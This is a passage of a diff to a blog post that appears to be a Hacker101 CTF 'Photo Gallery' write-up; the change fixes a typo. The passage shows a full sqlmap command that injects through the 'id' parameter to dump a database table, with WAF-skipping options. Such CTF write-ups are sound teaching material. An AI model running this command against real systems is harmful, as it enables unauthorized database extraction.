Lawlez/dev.lwlx.xyz/md/blog/hacker101-ctf-photo-gallery.md

 sqlmap -u "http://35.190.155.168/c947e97f6e/fetch?id=3" --method=GET --dump -D level5 -T photos -p id, --code=200 --ignore-code=500 --skip-waf -o --threads 4 -C filename
 ```

-This means that swlmap will start with the filename of id=3 which is exactly what we want right now.
+This means that sqlmap will start with the filename of id=3 which is exactly what we want right now.

 ![starts to query filename of id 3](/hackerone/photo-gallery-hash.png "query on the filename of id 3")
 So lets have a look at our results: